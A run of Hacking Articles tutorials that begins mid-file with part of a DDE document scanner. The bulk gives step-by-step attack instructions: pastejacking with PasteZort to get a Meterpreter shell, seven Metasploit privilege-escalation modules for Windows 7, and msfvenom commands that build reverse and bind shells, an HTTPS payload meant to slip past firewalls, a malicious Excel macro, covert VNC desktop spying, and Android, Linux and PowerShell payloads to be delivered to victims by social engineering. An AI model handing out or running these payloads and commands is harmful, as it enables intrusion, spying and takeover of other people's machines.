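    """Constructed minimal .docx: just enough structure for the scanner, not a full Word file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def para(*runs):
    """One paragraph whose field code is spread over the given instrText runs."""
    return "<w:p>" + "".join(f"<w:r><w:instrText>{r}</w:instrText></w:r>" for r in runs) + "</w:p>"


BODY = '<w:document xmlns:w="{ns}"><w:body>{paras}</w:body></w:document>'

# The untouched formula field the article shows after "Toggle Field Codes": harmless.
SAMPLE_CLEAN = build_docx(BODY.format(ns=W_NS, paras=para(" =\\* MERGEFORMAT ")))
# A DDEAUTO field split across two runs; the command text is a placeholder, not a real payload.
SAMPLE_DDE = build_docx(BODY.format(ns=W_NS, paras=para(" DDE", "AUTO placeholder_cmd ") + para(" PAGE ")))

if __name__ == "__main__":
    print("clean:", scan_docx(SAMPLE_CLEAN))
    print("dde:  ", scan_docx(SAMPLE_DDE))
```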

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post Exploiting Windows Machine with DDE Exploit appeared first on Hacking Articles.

Exploiting Remote machine with Pastejacking


Pastejacking is a technique that takes over the clipboard of a machine: for instance, when we copy text from a website, that text can be riddled with malicious code that will execute when you paste it. This is a very good way to achieve a Meterpreter session because of its simplicity. All that needs to be done is copy some harmless-looking words from the browser and paste them into the command prompt, and that’s it, session!!

We are going to walk you through the process using a tool called PasteZort.

Here’s how it happens:

The first thing you’ll need to do is get the tool from Github.

To keep it simple, from your Kali terminal navigate to the desktop using “cd Desktop”. Once you’re at “root@kali:~/Desktop#”, type “git clone https://github.com/Zetahack/PasteZort.git”. This will make a PasteZort folder on your desktop with the tool in it.

Open the folder and you will see all the files you need to run this tool, the inside of the folder will look like the screenshot given below.

In order to execute the tool we first must change the permission of the “encode.rb” file. Right click on the “encode.rb” file and open its properties, under properties, go to the “Permissions” tab, check the box in front of “Execute” that says “Allow executing file as program”.

Navigate to the PasteZort folder from the Kali terminal, now execute the tool using “python ./PasteZOrt.py”. Your tool is now running.

Now we can get started making our pastejacking payload using the tool’s interface. We will be making a Windows payload, so in front of “Objectves:” type “1” to choose Windows as the targeted operating system.

After that, again choose option “1” under “Select Payload” to generate a Windows reverse TCP shell. Enter your IP address in “LHOST” and the port number you want the exploit to communicate with in “LPORT”.

You will now get an option to enter the message you want displayed as the pastejacking text, for example: we have written “ping” and “http://www.hackingarticles.in”.

And that’s it, your payload is ready.

You will now be asked if you would like to turn on the Handler; type “Y” and press Enter.

Open a web browser on the victim machine and enter your IP in the address bar, the text you typed in the message section will appear, select the text and copy it.

Open command prompt on the victim machine, paste the copied text and press Enter.

Go back to the Kali terminal and you will see Handler starting the reverse tcp and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.

The beauty of this tool lies in its simplicity: it has a clean interface with an intuitive workflow and gets effective results without any mess. The message section makes it easy to make your payload look as harmless as possible. This also goes to show how easy it is to get hacked, so stay vigilant.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post Exploiting Remote machine with Pastejacking appeared first on Hacking Articles.

7 Ways to Privilege Escalation of Windows 7 PC


When you exploit the victim PC there are certain limits which prevent you from performing some actions even after you have the shell of the victim’s PC. To get complete access to your victim PC you need privilege escalation, where a user receives privileges they are not authorized for. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. Metasploit has various post exploits that use a number of different techniques to attempt to gain system-level privileges on the remote system.

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open the Kali Linux terminal and type msfconsole.

Use a payload for Windows and start multi/handler for the reverse connection. Once you have hacked the victim PC, go for privilege escalation using the following techniques.

Windows Escalate UAC Protection Bypass

Available targets: Windows x86 (32-bit) and Windows x64 (64-bit)

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.

msf > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set session 1

msf exploit(bypassuac) > exploit

Take a look at the image: when you use the getuid command it shows the user ID, which is username: pc 10; after using getsystem the username is now SYSTEM. Use getuid again and you will see that you now have admin access.

Windows Escalate UAC Protection Bypass (In Memory Injection)

Available targets: Windows x86 (32-bit) and Windows x64 (64-bit)

This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. This module uses the Reflective DLL Injection technique to drop only the DLL payload binary instead of three separate binaries in the standard technique. However, it requires the correct architecture to be selected, (use x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call Exit Process () after starting your payload in a separate process.

msf > use exploit/windows/local/bypassuac_injection

msf exploit(bypassuac_injection) > set session 1

msf exploit(bypassuac_injection) > exploit

Use the getsystem command and then check the user ID by typing getuid in meterpreter.

Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

Available targets: Windows x86 (32-bit) and Windows x64 (64-bit)

This module will bypass Windows UAC by utilizing the missing .manifest on the script host cscript/wscript.exe binaries.

msf > use windows/local/bypassuac_vbs

msf exploit(bypassuac_vbs) > set session 1

msf exploit(bypassuac_vbs) > exploit

Use the getsystem command and then check the user ID by typing getuid in meterpreter.

Windows Escalate UAC Execute RunAs

Available targets: Windows x86 (32-bit) and Windows x64 (64-bit)

This module will attempt to elevate the execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. The ask module always uses a self-generated payload, which is easily detected by AV. Click Yes to allow the payload to create another reverse shell with elevated privileges.

msf > use windows/local/ask

msf exploit(ask) > set session 1

msf exploit(ask) > exploit

Use the getsystem command and then check the user ID by typing getuid in meterpreter.

MS16-032 Secondary Logon Handle Privilege Escalation

Available targets: Windows x86 (32-bit) and Windows x64 (64-bit)

This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

msf > use windows/local/ms16_032_secondary_logon_handle_privesc

msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1

msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

Use the getsystem command and then check the user ID by typing getuid in meterpreter.

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Available targets: Windows x86 (32-bit)

This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.

msf exploit(ms16_016_webdav) > set session 1

msf exploit(ms16_016_webdav) > exploit

Use the getsystem command in meterpreter for admin access to the PC.

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

Available targets: Windows 7 32-bit

This module leverages a kernel pool overflow in Win32k which allows local privilege escalation. The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). This allows any unprivileged process to freely migrate to winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own 2013 by MWR to break out of Chrome’s sandbox. NOTE: when a meterpreter session started by this exploit exits, winlogon.exe is likely to crash.

msf exploit(ms13_053_schlamperei) > set session 1

msf exploit(ms13_053_schlamperei) > exploit

Use the getsystem command and then check the user ID by typing getuid in meterpreter.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a lover of social media and gadgets. Contact here

The post 7 Ways to Privilege Escalation of Windows 7 PC appeared first on Hacking Articles.

Msfvenom Tutorials for Beginners


Hello friends!!

Today we will learn to create payloads with a popular tool known as Metasploit; we will explore the various options available within the tool to create payloads with different extensions and techniques.

Msfvenom

Msfvenom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit.

Requirements:

  • Kali Linux
  • Windows Machine
  • Android Phone
  • Linux Machine

Abbreviations:

Lhost = (IP of Kali)

Lport = (any port you wish to assign to the listener)

P = (payload, i.e. Windows, Android, PHP etc.)

F = file format/extension (i.e. windows = exe, android = apk etc.)

Let’s Begin!!

From the Kali terminal type the command msfvenom as shown below. It will show you all the available options for creating a payload, but in this article we are talking about the different types of payload we can generate.

Bind shell

A bind shell is the kind that opens up a new service on the target machine and requires the attacker to connect to it in order to get a session.

Now type the below command in your Kali terminal:

msfvenom -p windows/meterpreter/bind_tcp -f exe > /root/Desktop/bind.exe

It will save the “exe” payload file on your desktop as specified on the command /root/Desktop/bind.exe We need to send this file to the victim machine through file share or by any social engineering technique and have it run on the system

Now start msfconsole and type the commands below to get a session on the victim machine. With a bind payload we connect to the target, so RHOST is the victim's IP:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/bind_tcp

msf exploit(handler) > set rhost 192.168.0.100

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Once the file is executed on the victim machine, the handler connects to it and we get a Meterpreter session, as shown below:

Because a bind payload listens on the target instead of calling out, the attacker decides when to connect and the victim needs no outbound route to us. The trade-off is that the listening port is visible to anyone who port-scans the target, and an inbound host firewall rule will block our connection; the reverse payload below avoids both problems.

Reverse TCP Payload

A reverse shell (also known as a connect-back) is the exact opposite: it requires the attacker to set up a listener first on his box, the target machine acts as a client connecting to that listener, and then finally the attacker receives the shell.

From the Kali terminal type the following command:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=5555 -f exe > /root/Desktop/reverse_tcp.exe

This time we include two more options, lhost (our IP) and lport (our listening port), which the payload uses to connect back to the Kali machine.

Once the payload is generated and sent to the victim for execution, we move to the next step:

Now start msfconsole and type the commands below to get a session on the victim machine. LHOST and LPORT must match the values baked into the payload:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 5555

msf exploit(handler) > exploit

As the image below confirms, once the victim executes the payload we receive a reverse connection and get a Meterpreter session.

HTTPS Payload

Note: both payloads above only work if the relevant ports are open between us and the victim. So what if the victim's network blocks outbound connections on almost every port?

In such cases we pick a port that is nearly always allowed out, such as 443 for HTTPS. The reverse_https payload also wraps the Meterpreter traffic in TLS, so on the wire it looks like ordinary web traffic rather than a raw TCP stream.

Let us use that case and create a payload over HTTPS. From the Kali terminal type the following command:

msfvenom -p windows/meterpreter/reverse_https lhost=192.168.0.107 lport=443 -f exe > /root/Desktop/443.exe

Once the payload is generated and sent to the victim for execution, we move to the next step:

Now start msfconsole and type the commands below to get a session on the victim machine (binding port 443 requires root, which is the default user on Kali):

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_https

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 443

msf exploit(handler) > exploit

We can confirm from the image that once the victim executes the payload we receive a reverse connection and get a Meterpreter session.

Hidden Bind TCP Payload

Let us now explore another technique available in msfvenom; this time we get a plain command shell from the victim machine instead of a Meterpreter session.

Let’s begin!!

This payload listens quietly in the background once executed, but unlike a normal bind shell it only accepts connections from the address given as AHOST; to every other host, including a port scanner, the port appears closed.

From the Kali terminal type the following command (AHOST is our Kali IP, the only address allowed to connect):

msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=1010 -f exe > /root/Desktop/hidden.exe

Once the payload is generated and sent to the victim for execution, we set up our side.

Since this is a plain shell rather than a staged Meterpreter payload, Netcat is enough to connect to it; no multi/handler is needed.

From the Kali terminal type the command below (192.168.0.100 is the victim's IP):

nc 192.168.0.100 1010

Reverse Shell Payload with Netcat

Let us now do the same with the shell_reverse_tcp payload, another way to get a shell session from the victim.

From the Kali terminal type the following command:

msfvenom -p windows/shell_reverse_tcp lhost=192.168.0.107 lport=1111 -f exe > /root/Desktop/ncshell.exe

Once the payload is generated and sent to the victim for execution, we move to the next step.

We set up our listener with Netcat before the victim runs the file; the image below shows the shell session captured on the Kali machine.

From the Kali terminal type the command below:

nc -lvp 1111

Macro Payload

Let us now create the payload as a VBA script, which we will use as a macro in an Excel workbook to exploit the victim machine.

Let us begin to create the payload!!

Open a Kali terminal and type the command below:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba

Once the command runs, copy the whole VBA script it prints, from the "#If Vba7" line down to the final "End Sub", as highlighted in the image below:

Now open an Excel workbook and press Alt+F11 to open the VBA editor; you get the dialog shown above. Enter the name you want to give the macro and click "Create".

You get the window shown above; click "ThisWorkbook", replace its contents with the VBA payload generated by msfvenom, close the VBA editor and enable macros. Save the workbook in a macro-enabled format (.xlsm or .xls); a plain .xlsx silently drops the macro.

Now fill the workbook with data that looks realistic enough for the victim to open it; in our case we simply inserted the value "Test". Save the file and send it to the victim.

To capture the sessions let us now start the multi handler as stated below:

Open a Kali terminal and type msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 7777

msf exploit(handler) > exploit

Once the victim opens the Excel file, it prompts them to enable macros; as soon as they do, our VBA executes and gives us a reverse connection to the victim machine, as shown in the image below.

VNC Payload

Wouldn't it be great to take remote control of the victim's desktop without their knowledge and watch their activity? This payload does exactly that, so let us use it to our benefit.

Let us begin to create the payload!! Open a Kali terminal and type the command below:

msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe

Once the payload is generated and sent to the victim for execution, we start the multi handler to capture the session, as stated below:

Open a Kali terminal and type msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/vncinject/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 5900

msf exploit(handler) > exploit

When the reverse connection arrives, the handler injects the VNC server into the victim process and a VNC viewer opens on our Kali machine showing the victim's desktop. By default the viewer runs in view-only mode; set ViewOnly false on the handler before running exploit if you want to control the desktop rather than just watch it.

Android Payload

Exploiting handheld devices has always been a hot topic and still is, so we have included it in this article as well; let us use the Android payload available in msfvenom.

Let’s begin

Open a Kali terminal and type the command below (the raw output of an Android payload is already an apk, so no -f option is needed):

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk

Once the payload is generated, send it to the victim to install and run on the handheld, and start the multi handler as shown in the image below:

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 8888

msf exploit(handler) > exploit

Once the payload runs, you get a Meterpreter session on the handheld, which is now under your control, as shown below.

Linux Payload

Open a Kali terminal and type the command below:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell

Once the payload is generated, send it to the victim to run on the Linux machine (the file must be made executable with chmod +x first) and start the multi handler as shown in the image below:

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Once the payload runs, it makes a reverse TCP connection to our Kali machine and gives us a Meterpreter session, as shown in the image below.
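One check worth doing before any exe or elf payload leaves the Kali box is that it was built for the target's CPU: the windows/... and linux/x86/... payloads used in this article are 32-bit, an x64-only target needs windows/x64/... or linux/x64/..., an x64 binary will not start at all on a 32-bit host, and on Windows the payload's architecture also decides whether you end up with an x86 or x64 Meterpreter. uname -m on Linux and the PROCESSOR_ARCHITECTURE variable on Windows tell you what the target is. The shell functions below are an added example, not part of the original article: they read the architecture straight from the ELF or PE header (the same fields the file utility reports), using only od, tr and POSIX sh. The function names are mine and the header files in the usage are constructed by hand, not real payloads.

```shell
#!/bin/sh
# Added example: read the CPU architecture of an msfvenom-generated binary
# from its ELF or PE header. Function names are my own choice.

# elf_arch FILE -> prints x86 | x64 | arm | arm64 | unknown:<e_machine>
# returns 1 if FILE is not an ELF image
elf_arch() {
    f=$1
    # bytes 0-3 magic, 4 EI_CLASS, 5 EI_DATA, 16-17 e_type, 18-19 e_machine
    set -- $(od -An -tx1 -v -N 20 "$f" 2>/dev/null)
    [ $# -ge 20 ] && [ "$1$2$3$4" = "7f454c46" ] || return 1
    if [ "$6" = "01" ]; then            # EI_DATA 01: little-endian, low byte first
        machine=$((0x${20}${19}))
    else                                # 02: big-endian
        machine=$((0x${19}${20}))
    fi
    case "$machine" in
        3)   echo x86 ;;                # EM_386
        62)  echo x64 ;;                # EM_X86_64
        40)  echo arm ;;                # EM_ARM
        183) echo arm64 ;;              # EM_AARCH64
        *)   echo "unknown:$machine" ;;
    esac
}

# pe_arch FILE -> same output for a PE/COFF executable (msfvenom -f exe)
pe_arch() {
    f=$1
    set -- $(od -An -tx1 -v -N 2 "$f" 2>/dev/null)
    [ "$1$2" = "4d5a" ] || return 1                         # "MZ" DOS header
    set -- $(od -An -tx1 -v -j 60 -N 4 "$f" 2>/dev/null)    # e_lfanew at 0x3c, little-endian
    [ $# -eq 4 ] || return 1
    off=$((0x$4$3$2$1))
    set -- $(od -An -tx1 -v -j "$off" -N 6 "$f" 2>/dev/null) # "PE\0\0" then Machine
    [ $# -eq 6 ] && [ "$1$2$3$4" = "50450000" ] || return 1
    machine=$((0x$6$5))
    case "$machine" in
        332)   echo x86 ;;              # IMAGE_FILE_MACHINE_I386  0x014c
        34404) echo x64 ;;              # IMAGE_FILE_MACHINE_AMD64 0x8664
        448)   echo arm ;;              # IMAGE_FILE_MACHINE_ARMNT 0x01c0
        43620) echo arm64 ;;            # IMAGE_FILE_MACHINE_ARM64 0xaa64
        *)     echo "unknown:$machine" ;;
    esac
}

# payload_arch FILE -> "elf x86", "pe x64", ...; returns 1 for any other format
payload_arch() {
    if a=$(elf_arch "$1"); then echo "elf $a"
    elif a=$(pe_arch "$1"); then echo "pe $a"
    else echo "unrecognised format: $1" >&2; return 1
    fi
}

# check_arch FILE EXPECTED -> succeeds only if the binary was built for EXPECTED
# (x86, x64, arm or arm64), e.g. x64 for a target whose uname -m says x86_64
check_arch() {
    got=$(payload_arch "$1") || return 1
    [ "${got#* }" = "$2" ]
}

# Run as a script: sh payload_arch.sh FILE
if [ $# -ge 1 ]; then
    payload_arch "$1"
fi
```

With the payloads from this article, payload_arch /root/Desktop/reverse_tcp.exe prints "pe x86" and payload_arch /root/Desktop/shell prints "elf x86"; check_arch /root/Desktop/shell x64 fails, which is exactly the mismatch you want to catch before the file is delivered to an x86_64 target.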

Powershell Payload

Open a Kali terminal and type the command below; the output is a batch file that launches a PowerShell reverse shell:

msfvenom -p cmd/windows/reverse_powershell  lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat

Once the payload is generated, send it to the victim to run on the Windows machine and start the multi handler as shown in the image below:

msf > use multi/handler

msf exploit(handler) > set payload cmd/windows/reverse_powershell

msf exploit(handler) > set lhost 192.168.0.107

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Once the payload runs, it gives us a reverse PowerShell session, as shown in the image below.

Author: Krishnan Sharma is a technology professional with a passion for information security and related fields; he loves technical writing and is part of our Hacking Articles team. He may be contacted here

The post Msfvenom Tutorials for Beginners appeared first on Hacking Articles.


